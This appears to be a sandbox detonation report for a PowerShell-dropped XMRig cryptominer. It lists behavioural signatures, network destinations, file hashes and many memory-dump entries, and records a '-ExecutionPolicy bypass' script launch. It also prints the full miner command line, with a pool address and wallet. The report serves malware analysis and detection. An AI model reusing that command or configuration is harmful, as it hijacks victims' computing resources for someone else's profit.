| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2396-46-0x00000189D2DA0000-0x00000189D2DC0000-memory.dmp
memory/2396-47-0x00000189D2DE0000-0x00000189D2E00000-memory.dmp
memory/2396-48-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/1280-49-0x00007FF83A090000-0x00007FF83AB52000-memory.dmp
memory/1280-50-0x00007FF83A093000-0x00007FF83A095000-memory.dmp
memory/2396-51-0x00000189D2E00000-0x00000189D2E20000-memory.dmp
memory/1280-52-0x00007FF83A090000-0x00007FF83AB52000-memory.dmp
memory/2396-53-0x00000189D2E20000-0x00000189D2E40000-memory.dmp
memory/2396-54-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-55-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-57-0x00000189D2E00000-0x00000189D2E20000-memory.dmp
memory/2396-56-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-58-0x00000189D2E20000-0x00000189D2E40000-memory.dmp
memory/2396-59-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-60-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-61-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-62-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-63-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-64-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-65-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-66-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-67-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-68-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-69-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-70-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-71-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-72-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-73-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-74-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-75-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-76-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-77-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-78-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-79-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-80-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-81-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-82-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-83-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-84-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-85-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-86-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-87-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-88-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-89-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-90-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-91-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-92-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-93-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-94-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-95-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-96-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-97-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-98-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-99-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-100-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-101-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-102-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-103-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-104-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-105-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-106-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-107-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-108-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-109-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-110-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-111-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-112-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-113-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-114-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-115-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-116-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-117-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:06
Platform
win10-20240404-en
Max time kernel
1799s
Max time network
1745s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5036 wrote to memory of 1648 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 5036 wrote to memory of 1648 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.193.132.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
Files
memory/5036-4-0x00007FFDC0CF3000-0x00007FFDC0CF4000-memory.dmp
memory/5036-5-0x000001F4791D0000-0x000001F4791F2000-memory.dmp
memory/5036-8-0x00007FFDC0CF0000-0x00007FFDC16DC000-memory.dmp
memory/5036-10-0x00007FFDC0CF0000-0x00007FFDC16DC000-memory.dmp
memory/5036-9-0x000001F479280000-0x000001F4792F6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kfkhxv4l.qnq.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/5036-25-0x00007FFDC0CF0000-0x00007FFDC16DC000-memory.dmp
memory/5036-48-0x000001F479410000-0x000001F479422000-memory.dmp
memory/5036-61-0x000001F479270000-0x000001F47927A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1648-90-0x000001FEAFAA0000-0x000001FEAFAC0000-memory.dmp
memory/1648-91-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-92-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/5036-93-0x00007FFDC0CF3000-0x00007FFDC0CF4000-memory.dmp
memory/5036-94-0x00007FFDC0CF0000-0x00007FFDC16DC000-memory.dmp
memory/5036-95-0x00007FFDC0CF0000-0x00007FFDC16DC000-memory.dmp
memory/1648-96-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-97-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-98-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-99-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-100-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-101-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-102-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-103-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-104-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-105-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-106-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-107-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-108-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-109-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-110-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-111-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-112-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-113-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-114-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-115-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-116-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-117-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-118-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-119-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-120-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-121-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-122-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-123-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-124-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-125-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-126-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-127-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-128-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-129-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-130-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-131-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-132-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-133-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-134-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-135-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-136-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-137-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-138-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-139-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-140-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-141-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-142-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-143-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-144-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-145-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-146-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-147-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-148-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-149-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-150-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-151-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-152-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-153-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-154-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-155-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-156-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:19
Platform
win11-20240508-en
Max time kernel
1788s
Max time network
1747s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4076 wrote to memory of 2704 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4076 wrote to memory of 2704 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/4076-0-0x00007FFC1B913000-0x00007FFC1B915000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qrl4a3xb.nov.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4076-9-0x0000018849D00000-0x0000018849D22000-memory.dmp
memory/4076-10-0x00007FFC1B910000-0x00007FFC1C3D2000-memory.dmp
memory/4076-11-0x00007FFC1B910000-0x00007FFC1C3D2000-memory.dmp
memory/4076-12-0x00007FFC1B910000-0x00007FFC1C3D2000-memory.dmp
memory/4076-14-0x0000018849D80000-0x0000018849D92000-memory.dmp
memory/4076-15-0x0000018849D70000-0x0000018849D7A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2704-46-0x0000022D02DE0000-0x0000022D02E00000-memory.dmp
memory/2704-47-0x0000022D96C90000-0x0000022D96CB0000-memory.dmp
memory/2704-48-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/4076-49-0x00007FFC1B913000-0x00007FFC1B915000-memory.dmp
memory/4076-50-0x00007FFC1B910000-0x00007FFC1C3D2000-memory.dmp
memory/2704-52-0x0000022D970D0000-0x0000022D970F0000-memory.dmp
memory/2704-51-0x0000022D97300000-0x0000022D97320000-memory.dmp
memory/2704-53-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-54-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-55-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-57-0x0000022D970D0000-0x0000022D970F0000-memory.dmp
memory/2704-56-0x0000022D97300000-0x0000022D97320000-memory.dmp
memory/2704-58-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-59-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-60-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-61-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-62-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-63-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-64-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-65-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-66-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-67-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-68-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-69-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-70-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-71-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-72-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-73-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-74-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-75-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-76-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-77-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-78-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-79-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-80-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-81-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-82-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-83-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-84-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-85-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-86-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-87-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-88-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-89-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-90-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-91-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-92-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-93-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-94-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-95-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-96-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-97-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
